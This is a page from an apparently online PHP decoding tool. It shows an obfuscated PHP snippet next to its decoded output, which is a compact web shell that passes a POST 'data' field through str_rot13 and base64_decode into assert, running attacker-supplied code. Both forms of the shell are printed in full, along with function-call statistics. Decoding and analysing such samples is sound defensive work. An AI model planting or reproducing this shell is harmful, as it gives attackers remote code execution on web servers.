Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $kuwt="a"."s".chr(115)."\x65"."r"."t";$lcr="b"."a"."\x73"."e"."6"."\x34".chr(95)."\..
Decoded Output download
<?php
$kuwt="a"."s".chr(115)."e"."r"."t";$lcr="b"."a"."s"."e"."6"."4".chr(95)."d".chr(101).chr(99).chr(111).chr(100)."e";$lx="s"."t".chr(114).chr(95)."r"."o".chr(116)."1"."3";@$kuwt(@$lcr(@$lx($_POST["d".chr(97).chr(116).chr(97)])));die(); ?>
Did this file decode correctly?
Original Code
<?php
$kuwt="a"."s".chr(115)."\x65"."r"."t";$lcr="b"."a"."\x73"."e"."6"."\x34".chr(95)."\x64".chr(101).chr(99).chr(111).chr(100)."e";$lx="s"."t".chr(114).chr(95)."\x72"."\x6f".chr(116)."\x31"."\x33";@$kuwt(@$lcr(@$lx($_POST["\x64".chr(97).chr(116).chr(97)])));die();
Function Calls
chr | 12 |
str_rot13 | 1 |
Stats
MD5 | 8de1a850b569685fec39cab3905fb3ed |
Eval Count | 0 |
Decode Time | 80 ms |